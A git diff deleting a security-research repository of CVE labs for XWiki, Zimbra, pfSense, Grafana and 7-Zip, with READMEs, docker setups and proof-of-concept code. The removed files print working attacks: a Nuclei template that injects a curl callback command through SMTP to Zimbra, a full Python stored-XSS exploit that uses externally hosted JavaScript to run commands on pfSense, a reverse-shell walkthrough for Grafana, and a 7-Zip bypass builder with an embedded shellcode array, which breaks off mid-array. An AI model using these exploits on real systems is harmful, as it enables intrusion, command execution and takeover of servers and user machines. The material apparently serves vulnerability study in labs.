diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..f8ff2b5 --- /dev/null +++ b/.gitattributes @@ -0,0 +1 @@ +*.mp4 filter=lfs diff=lfs merge=lfs -text diff --git a/CVE-2020-7660/Readme.md b/CVE-2020-7660/Readme.md deleted file mode 100644 index 6a3e980..0000000 --- a/CVE-2020-7660/Readme.md +++ /dev/null @@ -1,6 +0,0 @@ -# Description - -serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function "deleteFunctions" within "index.js". - -## More details to be added. - diff --git a/CVE-2024-31982/README.md b/CVE-2024-31982/README.md deleted file mode 100644 index 11c2366..0000000 --- a/CVE-2024-31982/README.md +++ /dev/null @@ -1,73 +0,0 @@ -# CVE-2024-31982 - XWiki Remote Code Execution (RCE) - -## Overview -**CVE-2024-31982** is a **Remote Code Execution (RCE)** vulnerability discovered in **XWiki**, a popular open-source wiki platform. The vulnerability exists in the **xwiki-platform-search-ui** component, allowing an attacker to execute arbitrary commands on the server due to improper input validation. - -## Affected Versions -The following versions of `org.xwiki.platform:xwiki-platform-search-ui` are vulnerable: - -- **2.4-milestone-1** up to **before 14.10.20** -- **15.0-rc-1** up to **before 15.5.4** -- **15.6-rc-1** up to **before 15.10-rc-1** - -### Patched Versions: -- **14.10.20** -- **15.5.4** -- **15.10-rc-1** - -## Root Cause -The vulnerability arises due to **insufficient input validation** in the search functionality. XWiki fails to properly sanitize user-controlled input, which can lead to command injection, allowing attackers to execute arbitrary system commands remotely. - -## Impact -A successful exploit of **CVE-2024-31982** can allow an attacker to: -- Execute arbitrary system commands on the XWiki server. -- Gain unauthorized access to sensitive data. -- Compromise the underlying infrastructure. -- Potentially achieve full server takeover. - -## Exploitation Scenario -An attacker can exploit this vulnerability by injecting malicious input through the XWiki search feature or another exposed endpoint. If the input is executed by the server without proper sanitization, it can lead to **Remote Code Execution**. - -## Mitigation -To protect against **CVE-2024-31982**, users should: -1. **Update XWiki** to one of the patched versions: - - **14.10.20** - - **15.5.4** - - **15.10-rc-1** -2. Restrict access to the XWiki search feature if unnecessary. -3. Implement Web Application Firewalls (WAF) to detect and block suspicious input. -4. Regularly audit logs for signs of exploitation. - -## References -- [XWiki Official Site](https://www.xwiki.org/) -- [CVE Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31982) - -> ⚠ **Disclaimer:** This information is provided for educational and research purposes only. Exploiting vulnerabilities in unauthorized environments is illegal. - ---- - -# How to Set Up the Vulnerable Lab -1. Clone the Repository (or create a new directory) - -``` -git clone https://github.com/your-repo/xwiki-cve-2024-31982 -cd xwiki-cve-2024-31982 -``` - -2. Run the Lab -``` - docker-compose up -d -``` - -3. Access XWiki -Open http://localhost:8080/ in your browser. - -4. Stop the Lab -``` -docker-compose down -``` - -5. Clean Up (If Needed) -``` -docker volume prune -f -``` diff --git a/CVE-2024-31982/docker-compose.yml b/CVE-2024-31982/docker-compose.yml deleted file mode 100644 index aadd139..0000000 --- a/CVE-2024-31982/docker-compose.yml +++ /dev/null @@ -1,37 +0,0 @@ -version: '3.8' - -services: - postgres: - image: postgres:latest - container_name: postgres-xwiki - restart: always - networks: - - xwiki-net - environment: - POSTGRES_USER: xwiki - POSTGRES_PASSWORD: xwiki - POSTGRES_DB: xwiki - volumes: - - postgres_data:/var/lib/postgresql/data - - xwiki: - image: xwiki:14.10.17-postgres-tomcat # Vulnerable Version - container_name: xwiki - restart: always - depends_on: - - postgres - networks: - - xwiki-net - ports: - - "8080:8080" - environment: - DB_USER: xwiki - DB_PASSWORD: xwiki - DB_DATABASE: xwiki - DB_HOST: postgres - -networks: - xwiki-net: - -volumes: - postgres_data: diff --git a/CVE-2024-31982/out-3.ogv b/CVE-2024-31982/out-3.ogv deleted file mode 100644 index 9fcaf22..0000000 Binary files a/CVE-2024-31982/out-3.ogv and /dev/null differ diff --git a/CVE-2024-45519/CVE-2024-45519.yaml b/CVE-2024-45519/CVE-2024-45519.yaml deleted file mode 100644 index 25da95c..0000000 --- a/CVE-2024-45519/CVE-2024-45519.yaml +++ /dev/null @@ -1,63 +0,0 @@ -id: CVE-2024-45519 - -info: - name: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution - author: pdresearch,iamnoooob,parthmalhotra,ice3man543 - severity: critical - description: | - SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system's integrity and confidentiality. - reference: - - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories - - https://blog.projectdiscovery.io/zimbra-remote-code-execution/ - classification: - cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* - metadata: - vendor: synacor - product: zimbra_collaboration_suite - shodan-query: - - http.title:"zimbra collaboration suite" - - http.title:"zimbra web client sign in" - - http.favicon.hash:1624375939 - fofa-query: - - title="zimbra web client sign in" - - title="zimbra collaboration suite" - tags: cve,cve2024,rce,zimbra - -javascript: - - pre-condition: | - isPortOpen(Host,Port); - code: | - let m = require('nuclei/net'); - let address = Host+":"+Port; - let conn; - conn= m.Open('tcp', address) - conn.Send('EHLO localhost\r\n'); - conn.RecvString() - conn.Send('MAIL FROM: \r\n'); - conn.RecvString() - conn.Send('RCPT TO: <"aabbb$(curl${IFS}'+oast+')"@mail.domain.com>\r\n'); - conn.RecvString() - conn.Send('DATA\r\n'); - conn.RecvString() - conn.Send('aaa\r\n'); - conn.RecvString() - conn.Send('.\r\n'); - resp = conn.RecvString() - conn.Send('QUIT\r\n'); - conn.Close() - resp - args: - Host: "{{Host}}" - Port: 25 - oast: "{{interactsh-url}}" - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - - type: word - words: - - "message delivered" diff --git a/CVE-2024-45519/README.md b/CVE-2024-45519/README.md deleted file mode 100644 index 41edb13..0000000 --- a/CVE-2024-45519/README.md +++ /dev/null @@ -1,70 +0,0 @@ -# CVE-2024-45519 Breakdown and Root Cause Analysis (Under the Supervision of Swati Laxmi) - -### Overview of Zimbra Collaboration Suite -Zimbra Collaboration Suite (ZCS) is a widely-used open-source platform that provides email and collaboration services, including calendaring, contacts, tasks, and chat. Renowned for its flexibility and open-source nature, Zimbra is often chosen by organizations as an alternative to proprietary solutions, particularly in educational institutions, government agencies, and enterprises. Given its broad adoption, Zimbra is a critical target for attackers. Vulnerabilities in this platform can have far-reaching effects, making security crucial. Through extensive research, I have gained a thorough understanding of the root cause of the vulnerability in the package. - -### The Importance of Remote Command Execution Vulnerabilities -Remote Command Execution (RCE) vulnerabilities are among the most dangerous as they allow attackers to execute arbitrary commands on a target server. This type of vulnerability grants attackers direct access to the underlying system, which can lead to serious security breaches, including data compromise, privilege escalation, and lateral movement within a network. For collaborative platforms like Zimbra, RCE vulnerabilities are especially impactful, as they can expose an organization's communication infrastructure and lead to significant data breaches and operational disruptions. Imagine an attacker gaining control of your server’s shell, running arbitrary commands at will. - -### Overview of CVE-2024-45519 -CVE-2024-45519 is a recently discovered RCE vulnerability that affects specific versions of Zimbra Collaboration Suite. The vulnerability stems from insufficient input validation within Zimbra’s web application, allowing attackers to craft malicious requests that execute arbitrary commands on the server. Discovered in October 2024, CVE-2024-45519 has a high CVSS score of 9.4, which reflects its severe impact and ease of exploitation. Organizations using the affected versions of Zimbra are strongly urged to apply security patches promptly to mitigate the risks associated with this vulnerability. - -# Vulnerability Analysis - -### How CVE-2024-45519 Occurs -The vulnerability in CVE-2024-45519 arises from weak input validation within Zimbra’s web application. Certain fields in Zimbra's HTTP requests are not properly sanitized, allowing attackers to inject and execute malicious commands on the server. This insufficient input validation leads to a command injection vulnerability, where the attacker bypasses standard security checks and runs arbitrary commands. Upon deeper investigation, I discovered that the vulnerability is tied to the `postjournal` service, where I identified key differences in the paths that expose the vulnerability. - -![Difference](images/diff.png) - -### Why This Vulnerability is Exploitable -CVE-2024-45519 is exploitable because of Zimbra's relaxed input validation. Due to improper sanitization, certain fields in HTTP requests are vulnerable to command injection. Attackers can craft specially designed HTTP requests containing malicious payloads that the backend processes as legitimate commands, executing them with the privileges granted to the Zimbra service account. This lack of strict input handling makes it easy for attackers to manipulate the system. - -### Impact of Exploitation -Exploitation of CVE-2024-45519 provides attackers with the ability to run arbitrary commands on the Zimbra server. This access can lead to several severe consequences: - -- **Privilege Escalation**: Attackers can leverage this vulnerability to escalate their privileges, potentially gaining access to other sensitive areas of the server or network. -- **Data Compromise**: Attackers can read, modify, or delete emails, contacts, and other sensitive information stored within Zimbra. -- **Further Network Compromise**: Once inside Zimbra, attackers may pivot to other parts of the network, executing additional attacks and establishing persistence. - -In conclusion, CVE-2024-45519 represents a serious risk to Zimbra deployments. It underscores the need for robust input validation and timely patching to prevent unauthorized access and data breaches. - -## Lab Setup 🖥️ - -1. **Prepare the test environment** - Make sure you're running Ubuntu 20.04.6 LTS (Focal Fossa) on your lab machine. - Example test environment: Ubuntu 20.04.6 LTS. - -2. **Download Zimbra** - Run the following commands to download and extract the Zimbra Collaboration package: - ```bash - sudo su - wget https://files.zimbra.com/downloads/8.8.15_GA/zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220.tgz - tar -xvzf zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220.tgz - cd zcs-NETWORK-8.8.15_GA_4177.UBUNTU20_64.20211112014220 - ``` - -3. **Configure hostname** - Set the hostname to `zimbra.labo`: - ```bash - hostnamectl set-hostname zimbra.labo - ``` - -4. **Install Zimbra** - Follow the installation guide here 👉 [Zimbra Installation Guide](https://zimbra.github.io/installguides/latest/single.html#Installing_Zimbra_Collaboration_Software). - Use Zimbra's package repository when prompted. Select **Yes** for that option. - -5. **Replace the vulnerable `postjournal` binary** - Kill the running `postjournal` process and replace the binary with the vulnerable one: - ```bash - sudo pkill postjournal - dpkg-deb -x packages/zimbra-core_8.8.15.GA.4177.UBUNTU20.64_amd64.deb /tmp/zimbra-core - sudo cp /tmp/zimbra-core/opt/zimbra/libexec/postjournal /opt/zimbra/libexec/postjournal - ``` - -6. **Enable and restart Zimbra services** - Log in as the `zimbra` user and enable the `postjournal` service: - ```bash - sudo su - zimbra - zmlocalconfig -e postjournal_enabled=true - zmcontrol restart - ``` diff --git a/CVE-2024-45519/Resources.md b/CVE-2024-45519/Resources.md deleted file mode 100644 index 643bdb6..0000000 --- a/CVE-2024-45519/Resources.md +++ /dev/null @@ -1 +0,0 @@ -1. https://github.com/advisories/GHSA-fr4c-ch83-r968 diff --git a/CVE-2024-45519/images/Readme b/CVE-2024-45519/images/Readme deleted file mode 100644 index 8b13789..0000000 --- a/CVE-2024-45519/images/Readme +++ /dev/null @@ -1 +0,0 @@ - diff --git a/CVE-2024-45519/images/diff.png b/CVE-2024-45519/images/diff.png deleted file mode 100644 index 1432309..0000000 Binary files a/CVE-2024-45519/images/diff.png and /dev/null differ diff --git a/CVE-2024-45519/images/docker1.png b/CVE-2024-45519/images/docker1.png deleted file mode 100644 index 7ec9060..0000000 Binary files a/CVE-2024-45519/images/docker1.png and /dev/null differ diff --git a/CVE-2024-45519/images/flowchart.png b/CVE-2024-45519/images/flowchart.png deleted file mode 100644 index 02d3bc3..0000000 Binary files a/CVE-2024-45519/images/flowchart.png and /dev/null differ diff --git a/CVE-2024-45519/images/revers.png b/CVE-2024-45519/images/revers.png deleted file mode 100644 index 1476c87..0000000 Binary files a/CVE-2024-45519/images/revers.png and /dev/null differ diff --git a/CVE-2024-45519/images/vuln1.png b/CVE-2024-45519/images/vuln1.png deleted file mode 100644 index e3eec58..0000000 Binary files a/CVE-2024-45519/images/vuln1.png and /dev/null differ diff --git a/CVE-2024-46538/CVE-2024-46538.py b/CVE-2024-46538/CVE-2024-46538.py deleted file mode 100644 index 07e51e3..0000000 --- a/CVE-2024-46538/CVE-2024-46538.py +++ /dev/null @@ -1,230 +0,0 @@ -import re -from faker import Faker -import random -import string -import uuid -import requests -import time -import sys -import rich_click as click - -# Turn off the InsecureRequestWarning -requests.packages.urllib3.disable_warnings( - requests.packages.urllib3.exceptions.InsecureRequestWarning -) - -# Banner -banner = """ - .+@%%%@- - .:%%=::::::@. - .-*@@@@%+-::=%@%+--:@. - :#@*-..#%-:::::::::+@:=%@@%@@%= - -@#:....:@-::::::::::::=@....=@#--@ - .%#:.......:-:*%%%%%*-::::-@.......=@@. - ##.....................-*%@%=.........-@: - .@:.......................................#* - -@..........................................+# .:-----::.. .::.. - :@............................................+# *@@@@@@@@@@@@@% -%@@@@@@@@@@%- *%@@@@@@@@%#. -.@:.............................................%- %@@@@@@@@@@@@@@: %@@@@@@@@@@@@@@- *@@@@@@@@@@@@@@- -=#..............................................-@ %@@@@@@@@@@@@@@:-@@@@@@@@@@@@@@@-:@@@@@@@@@@@@@@@+ -#=...............................................@ .-=+++++%@@@@@:+@@@@: -@@@@@--@@@@*....=@@@@@+ -@:...............................................@ . .%@@@@@:+@@@@: =@@@@@-=@@@@- :@@@@@+ -@:...+@%*:..................:=#@+................@ *@@@@@@@@@@@@@@ +@@@@%::::%@@@@@-=@@@@* *@@@@@+ -%-...............................................@ @@@@@@@@@@@@@@= +@@@@@@@@@@@@@@@--@@@@@@@@@@@@@@@+ -=#....+%@%+.................=#%%*-..............-@ .@@@@@@@@@@@@%: %@@@@@@@@@@@@@@:.%@@@@@@@@@@@@@@= -.@...% .@@:.............+% %@@:............#= .@@@@@. -*%%@@@@@@@@@: =%@@@@@@@@@@@@- - :@.-= -+@+............:@. *%@%...........=# .@@@@@@@@@@@@@@* %@@@@@. .@@@@@@: - -@.=@@@%+#...=@%@@-.....:@@@@@ @:..........+% @@@@@@@@@@@@@@@ @@@@@@ .@@@@@@. - :@-:::::....-++=+:#:.....:=++=:...........** #@@@@@@@@@@@@@% %@@@@# .@@@@@# - %#::::.................:::::::........:@: =%@@@@@@@@@% #@@@@: #@@@@+ - .%#-::................:::::::......=@= - -@%:...........::..::::::::..=@# - @+@@%++*@#@+-:-+@*--=#%@*=** - %-:#.....%=........@=......:@ - *+.......%-.............+#..@ - @=......-@:......:%@%*#@@:.@# - -@%**#@+:%@*+@#+%...::..@.@-*% - :@.......%=.....@-..:@::%+.:::-@ - %-......=#......%-..::--:...:::@. - #+......:@......:@-::::::....:+% - -=+@=......+#.......%%-::::...-@*. - -+-::::+@@@@@@@=%@@@@@@@@@@@@@@@#-::-+: Author: EQST(Experts, Qualified Security Team) - .=++=-:::::::::::::--===+++++++++++++- Github: https://github.com/EQSTLab/CVE-2024-46538 - .:--====--:. - -Analysis base : https://github.com/physicszq/web_issue/blob/main/pfsense/interfaces_groups_edit_file.md_xss.md - -============================================================================================================= - -CVE-2024-46538 : PfSense XSS Vulnerability -description: A cross-site scripting (XSS) vulnerability in pfsense v2.5.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the $pconfig variable at interfaces_groups_edit.php. - -============================================================================================================= -""" - -class PfExploit: - - def __init__(self, id: str, pw: str, js: str, url: str, cmd: str): - self.loginId = id - self.loginPw = pw - self.url = url - self.cmd = cmd - self.jsId = None - self.jsUrl = js - self.jsSecret = None - self.fake = Faker() - - def greeting() -> None: - print(banner) - - def spinner(duration=10, interval=0.1): - spinner_chars = ['|', '/', '-', '\\'] - end_time = time.time() + duration - while time.time() < end_time: - for char in spinner_chars: - sys.stdout.write(f'\r[{char}] Loading, please wait...') - sys.stdout.flush() - time.sleep(interval) - print("") - - def add_protocol(self, url: str) -> str: - if not url.startswith(('http://', 'https://')): - return 'https://' + url - return url - - def getJS(self) -> None: - # Used api mocky to make callback - url = "https://api.mocky.io/api/mock" - cmd = self.cmd - - characters = string.ascii_letters # ascii letters to make random (Case sensitive) - secretRandom = ''.join(random.choice(characters) for _ in range(36)) - - body = { - "status":200, - "content":'var formData = new FormData();formData.append("__csrf_magic", csrfMagicToken);formData.append("txtCommand", "' + cmd + '");formData.append("txtRecallBuffer", "id");formData.append("submit", "EXEC");formData.append("dlPath", "");formData.append("ulfile", new Blob(), "");formData.append("txtPHPCommand", "");fetch("/diag_command.php", {method: "POST",body: formData}).then(response => response.text()).then(data => {const parser = new DOMParser();const doc = parser.parseFromString(data, "text/html");const contentDiv = doc.querySelector("div.content");if (contentDiv) {alert(contentDiv.textContent);} else {alert("No content found");}})', - "content_type":"application/javascript", - "charset":"UTF-8", - "secret":f"{secretRandom}", - "expiration":"never" - } - - response = requests.post(url, json=body, verify=False) - data = response.json() - self.jsId = data.get('id') - self.jsSecret = data.get('secret') - self.jsUrl = f"{data.get('link')}/{str(uuid.uuid4())}.js" - - def deleteJS(self) -> None: - url = f"https://api.mocky.io/api/mock/{self.jsId}" - body = {"id":f"{self.jsId}","secret":f"{self.jsSecret}"} - requests.delete(url, json=body, verify=False) - - def getCSRFToken(self, url, cookies="") -> str: - url = f"{url}" - response = requests.get(url, verify=False, cookies=cookies) - match = re.search(r" str: - # Get login csrf token - url = f"{self.add_protocol(self.url)}/index.php" - token = self.getCSRFToken(url) - response = requests.get(url, verify=False) - match = re.search(r" None: - # Get csrf token - url = f"{self.add_protocol(self.url)}/interfaces_groups_edit.php" - sessid = self.getSession() - cookies = { - 'PHPSESSID': sessid - } - token = self.getCSRFToken(url, cookies=cookies) - # Stored XSS Attack - url = f"{self.add_protocol(self.url)}/interfaces_groups_edit.php" - datas = { - '__csrf_magic':token, - 'ifname': self.fake.last_name(), - 'descr':'EQST_Lab_Pfsense_test', - 'members[]': f'wan', - 'save':'%E4%BF%9D%E5%AD%98' - } - response = requests.post(url, data=datas, cookies=cookies, verify=False, allow_redirects=False) - if response.status_code == 302: - print(f"[+] Done! Login Admin and check: \n{self.add_protocol(self.url)}/interfaces_groups.php") - return sessid - else: - print(f"[-] Attack Failed...") - exit(1) - -# argument parsing with rich_click -@click.command() -@click.option( - "-i", - "--id", - required=True, - help="Specify a id to login", -) -@click.option( - "-p", - "--pw", - required=True, - help="Specify a password to login", -) -@click.option( - "-u", - "--url", - required=True, - help="Specify a URL or domain for vulnerability detection", -) -@click.option( - "-c", - "--cmd", - default="id", - help="Specify the command to execute", -) -@click.option( - "-j", - "--js", - default="", - help="[Optional] Specify a Callback javascript URL" -) - -def main(id: str, pw: str, js: str, url: str, cmd: str) -> None: - cve_exploit = PfExploit(id, pw, js, url, cmd) - PfExploit.greeting() - PfExploit.spinner(duration=1) - # If js Url not exists - if cve_exploit.jsUrl == "": - cve_exploit.getJS() - cve_exploit.storeScript() - -if __name__ == "__main__": - main() diff --git a/CVE-2024-46538/README.md b/CVE-2024-46538/README.md deleted file mode 100644 index 99342c0..0000000 --- a/CVE-2024-46538/README.md +++ /dev/null @@ -1,51 +0,0 @@ -## Description - -A cross-site scripting (XSS) vulnerability in pfSense v2.5.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the `$pconfig` variable at `interfaces_groups_edit.php`. - ----- - -### References - -- [NVD CVE-2024-46538](https://nvd.nist.gov/vuln/detail/CVE-2024-46538) -- [GitHub Issue Report](https://github.com/physicszq/web_issue/blob/main/pfsense/interfaces_groups_edit_file.md_xss.md) -- [pfSense Redmine Issue #15778](https://redmine.pfsense.org/issues/15778) - ----- - -### CVSS v3 Base Metrics - -| Metric | Value | -|-----------------------|-----------| -| **Attack Vector** | Network | -| **Attack Complexity** | Low | -| **Privileges Required** | None | -| **User Interaction** | Required | -| **Scope** | Changed | -| **Confidentiality** | High | -| **Integrity** | High | -| **Availability** | None | - ----- - -## Steps to Set Up and Reproduce the Lab - -1. **Download the Vulnerable Software** - [Download pfSense v2.5.2](https://github.com/CloudSentralDotNet/iso_pfsense). Make sure to select version 2.5.2. - -2. **Set Up Your Virtual Lab** - Prepare two virtual machines: one as the attacker machine and another to host the pfSense software. - - *(Images can be added here for visual guidance)* - -3. **Start pfSense and Log In** - - Launch pfSense and log in with the default credentials: - - **Username**: `admin` - - **Password**: `pfsense` - - Once logged in, obtain the IP address where pfSense is running for further configuration. - *(You can change the credentials as needed.)* - -4. **Run the Proof of Concept (PoC) Script** - Use the PoC script to establish a connection and trigger the vulnerability. - -5. **Confirm XSS Execution** - In this demonstration, `/etc/passwd` is used to show the impact of the XSS vulnerability, highlighting the potential consequences for testing purposes. diff --git a/CVE-2024-46538/demo/README b/CVE-2024-46538/demo/README deleted file mode 100644 index cdf4cb4..0000000 --- a/CVE-2024-46538/demo/README +++ /dev/null @@ -1 +0,0 @@ -! diff --git a/CVE-2024-46538/demo/demo.mp4 b/CVE-2024-46538/demo/demo.mp4 deleted file mode 100644 index 88f3bcc..0000000 Binary files a/CVE-2024-46538/demo/demo.mp4 and /dev/null differ diff --git a/CVE-2024-46538/pictures/README b/CVE-2024-46538/pictures/README deleted file mode 100644 index 8b13789..0000000 --- a/CVE-2024-46538/pictures/README +++ /dev/null @@ -1 +0,0 @@ - diff --git a/CVE-2024-46538/pictures/Screenshot 2024-11-14 130710.png b/CVE-2024-46538/pictures/Screenshot 2024-11-14 130710.png deleted file mode 100644 index 2d7124e..0000000 Binary files a/CVE-2024-46538/pictures/Screenshot 2024-11-14 130710.png and /dev/null differ diff --git a/CVE-2024-46538/pictures/Screenshot 2024-11-14 130725.png b/CVE-2024-46538/pictures/Screenshot 2024-11-14 130725.png deleted file mode 100644 index 81ebee0..0000000 Binary files a/CVE-2024-46538/pictures/Screenshot 2024-11-14 130725.png and /dev/null differ diff --git a/CVE-2024-49113/Readme.md b/CVE-2024-49113/Readme.md deleted file mode 100644 index dd20a16..0000000 --- a/CVE-2024-49113/Readme.md +++ /dev/null @@ -1,6 +0,0 @@ -# Vulnerability -Authentication bypass condition in LDAP authentication in M-Files server versions before 24.11 supported usage of OpenLDAP configurations that allowed user authentication without a password when the LDAP server itself had the vulnerable configuration. - -# Reference - -https://github.com/SafeBreach-Labs/CVE-2024-49113 diff --git a/CVE-2024-9264/Dockerfile b/CVE-2024-9264/Dockerfile deleted file mode 100644 index bb570a8..0000000 --- a/CVE-2024-9264/Dockerfile +++ /dev/null @@ -1,15 +0,0 @@ -# Dockerfile -FROM grafana/grafana:11.0.0-ubuntu - -USER root - -# Install DuckDB -RUN apt-get update && apt-get install -y && apt-get install unzip -y \ - wget \ - && wget https://github.com/duckdb/duckdb/releases/download/v0.8.1/duckdb_cli-linux-amd64.zip \ - && unzip duckdb_cli-linux-amd64.zip -d /usr/local/bin/ \ - && chmod +x /usr/local/bin/duckdb \ - && rm duckdb_cli-linux-amd64.zip - -# Add DuckDB to the PATH -ENV PATH="/usr/local/bin:${PATH}" diff --git a/CVE-2024-9264/README.md b/CVE-2024-9264/README.md deleted file mode 100644 index 09f18aa..0000000 --- a/CVE-2024-9264/README.md +++ /dev/null @@ -1,58 +0,0 @@ -# Grafana SQL Expressions Vulnerability Allows Remote Code Execution - -![POC](pictures/poc.png) - -**CVE ID**: CVE-2024-9264 -**Date Published**: October 17, 2024 - -## Description - -The **SQL Expressions** experimental feature of **Grafana** allows for the evaluation of **DuckDB** queries that can contain user input. However, these queries are **insufficiently sanitized** before being passed to DuckDB, resulting in a **command injection** and **local file inclusion (LFI)** vulnerability. - -This vulnerability allows an attacker to execute arbitrary commands on the system and potentially read sensitive files, which can be exploited by any user with **VIEWER** or higher permissions in Grafana. - -The attack requires the **DuckDB binary** to be present in Grafana's **$PATH**, but by default, this binary is **not included** in Grafana distributions. If the binary is installed, however, the vulnerability can be exploited. - -The vulnerability was introduced in **Grafana version 11.0.0** and has been fixed in the following versions (for both OSS and Enterprise editions): - -- **11.0.5+security-01** -- **11.1.6+security-01** -- **11.2.1+security-01** -- **11.0.6+security-01** -- **11.1.7+security-01** -- **11.2.2+security-01** - -**Note**: The fixes have been provided for both the latest and previous patch versions of all impacted releases. This ensures that users who are still in the process of updating can mitigate the vulnerability immediately without requiring further changes. - ---- - -## Set Up Your Own Lab - -DuckDB is an open-source project, and the vulnerable build is available in their GitHub assets. Since it's open-source, there is nothing hidden, and you can manually download it. However, to simplify the process, you can use the Dockerfile provided in the repository. - -1. Visit [DuckDB releases](https://github.com/duckdb/duckdb/releases) and download version **0.8.1** (the version used for this demonstration). -2. Run the Dockerfile from the repository. -3. Once the container is up and running, access Grafana at [http://localhost:3000](http://localhost:3000). - ---- - -## Attack Scenario - -To exploit this vulnerability and achieve remote code execution, follow these steps: - -### 1. Set up a Netcat listener - -Start a Netcat listener on an unused port on your machine to catch the reverse shell: - -```bash -nc -lvp -``` - -Replace with any open, unused port on your machine. -### 2. Run the POC file - -Run the Proof of Concept (POC) file in Grafana that triggers the vulnerability. The POC will inject malicious code into the SQL expressions, causing the remote code execution. -### 3. Gain Access - -Once the attack is executed, you should have access to the system through the reverse shell opened by the Netcat listener. - diff --git a/CVE-2024-9264/demo/README b/CVE-2024-9264/demo/README deleted file mode 100644 index cdf4cb4..0000000 --- a/CVE-2024-9264/demo/README +++ /dev/null @@ -1 +0,0 @@ -! diff --git a/CVE-2024-9264/demo/demo.mp4 b/CVE-2024-9264/demo/demo.mp4 deleted file mode 100644 index 83f6939..0000000 Binary files a/CVE-2024-9264/demo/demo.mp4 and /dev/null differ diff --git a/CVE-2024-9264/docker-compose.yml b/CVE-2024-9264/docker-compose.yml deleted file mode 100644 index 94dbb16..0000000 --- a/CVE-2024-9264/docker-compose.yml +++ /dev/null @@ -1,40 +0,0 @@ -services: - mysql: - image: mysql:latest - restart: always - environment: - - MYSQL_ROOT_PASSWORD=rootpassword - - MYSQL_DATABASE=grafanadb - - MYSQL_USER=grafana - - MYSQL_PASSWORD=grafanapassword - volumes: - - ./mysql-data:/var/lib/mysql - ports: - - "3306:3306" - healthcheck: - test: ["CMD", "mysqladmin", "ping", "-h", "localhost"] - interval: 10s - timeout: 5s - retries: 3 - - grafana: - build: . - ports: - - "3000:3000" - environment: - - GF_SECURITY_ADMIN_PASSWORD=FreyXFI - - GF_DATABASE_TYPE=mysql - - GF_DATABASE_HOST=mysql:3306 - - GF_DATABASE_USER=grafana - - GF_DATABASE_PASSWORD=grafanapassword - - GF_DATABASE_NAME=grafanadb - volumes: - - grafana-storage:/var/lib/grafana - - ./grafana.ini:/etc/grafana/grafana.ini - - depends_on: - mysql: - condition: service_healthy -volumes: - grafana-storage: - mysql-storage: diff --git a/CVE-2024-9264/pictures/README b/CVE-2024-9264/pictures/README deleted file mode 100644 index 092bfb9..0000000 --- a/CVE-2024-9264/pictures/README +++ /dev/null @@ -1 +0,0 @@ -yo diff --git a/CVE-2024-9264/pictures/poc.png b/CVE-2024-9264/pictures/poc.png deleted file mode 100644 index 8c5211c..0000000 Binary files a/CVE-2024-9264/pictures/poc.png and /dev/null differ diff --git a/CVE-2025-0411/7-Zip-CVE-2025-0411-PoC.py b/CVE-2025-0411/7-Zip-CVE-2025-0411-PoC.py deleted file mode 100644 index 872d260..0000000 --- a/CVE-2025-0411/7-Zip-CVE-2025-0411-PoC.py +++ /dev/null @@ -1,79 +0,0 @@ -import os -import subprocess -import re - -VULNERABLE_VERSION_THRESHOLD = (24, 9) # 7-Zip versions prior to 24.09 are vulnerable - -def get_7zip_version(): - """Check if 7-Zip is installed and return its version.""" - try: - result = subprocess.run(["7z"], capture_output=True, text=True) - match = re.search(r"7-Zip (\d+)\.(\d+)", result.stdout) - if match: - major, minor = int(match.group(1)), int(match.group(2)) - return major, minor - except FileNotFoundError: - print("[!] 7-Zip is not installed or not in PATH.") - return None - return None - -def check_vulnerability(version): - """Check if the detected 7-Zip version is vulnerable (prior to 24.09).""" - return version < VULNERABLE_VERSION_THRESHOLD - -def compile_cpp(source_file, output_file): - """Compile a C++ file into an executable using g++.""" - if not os.path.exists(source_file): - print(f"[!] Source file '{source_file}' not found.") - return False - try: - subprocess.run(["g++", source_file, "-o", output_file, "-static", "-s"], check=True) - print(f"[+] Compiled: {output_file}") - return True - except subprocess.CalledProcessError as e: - print(f"[!] Compilation failed: {e}") - return False - -def compress_file(input_file, output_archive): - """Compress a file using 7-Zip.""" - if not os.path.exists(input_file): - print(f"[!] File '{input_file}' not found.") - return False - try: - subprocess.run(["7z", "a", output_archive, input_file], check=True) - print(f"[+] Created: {output_archive}") - return True - except subprocess.CalledProcessError as e: - print(f"[!] Compression failed: {e}") - return False - -def main(): - version = get_7zip_version() - if not version: - return - - print(f"[*] Detected 7-Zip version: {version[0]}.{version[1]}") - - if check_vulnerability(version): - print("[!] Vulnerable 7-Zip version detected!") - choice = input("[?] Do you want to continue? (y/n): ").strip().lower() - if choice != 'y': - print("[*] Exiting.") - return - else: - print("[*] 7-Zip is not vulnerable. Exiting.") - return - - cpp_file = "executable.cpp" - exe_file = "compiled.exe" - - if not compile_cpp(cpp_file, exe_file): - return - - if not compress_file(exe_file, "first_compressed.7z"): - return - - compress_file("first_compressed.7z", "double_compressed.7z") - -if __name__ == "__main__": - main() diff --git a/CVE-2025-0411/executable.cpp b/CVE-2025-0411/executable.cpp deleted file mode 100644 index 032bd9d..0000000 --- a/CVE-2025-0411/executable.cpp +++ /dev/null @@ -1,67 +0,0 @@ -#include -#include - -unsigned char shellcode[] = { - 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, - 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, - 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, - 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, - 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, - 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 